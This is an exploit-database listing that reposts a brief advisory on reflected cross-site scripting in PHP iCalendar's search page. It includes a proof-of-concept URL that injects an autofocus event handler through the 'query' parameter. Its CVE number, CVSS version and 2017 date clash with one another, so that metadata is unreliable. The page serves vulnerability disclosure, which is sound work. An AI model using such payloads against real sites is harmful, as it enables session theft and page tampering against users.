Advertisement






PHP iCalendar Cross Site Scripting (XSS)

CVE Category Price Severity
CVE-2020-10953 CWE-79 $500 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2017-10-27
CPE
cpe:cpe:/a:php-icalendar:1.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.14375 0.87538

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100197

Below is a copy:

PHP iCalendar Cross Site Scripting (XSS)
-------------------------------------------
           XSS In PHP ICalendar 
         By SonnySpooks       
-------------------------------------------
                 [Contact]
      Twitter: @SonnySpooks
-------------------------------------------
1.             [About App]
-------------------------------------------
   PHP ICalendar is an ICal file viewer
 Large sites use it all the time of course
It comes suitable and compatible with RSSNF
-------------------------------------------
2.            [Issue With It]
-------------------------------------------
   The Query= Parameter in the Search Bar
    Does not sanitize Parses all the way.
-------------------------------------------
3.         [Replication of attack]
-------------------------------------------
Placement: /search.php?cpath=&cal=&getdate=20160424&query=<PayLoad>
Example: /search.php?cpath=&cal=&getdate=20160424&query=1" onfocus="alert('XSS')" autofocus="">
-------------------------------------------
              ________
             /\       \
            /  \       \
           /    \       \
          /      \_______\
          \      /       /
        ___\    /   ____/___
       /\   \  /   /\       \
      /  \   \/___/  \       \
     /    \       \   \       \
    /      \_______\   \_______\
    \      /       /   /       /
     \    /       /   /       /
      \  /       /\  /       /
       \/_______/  \/_______/    
-------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum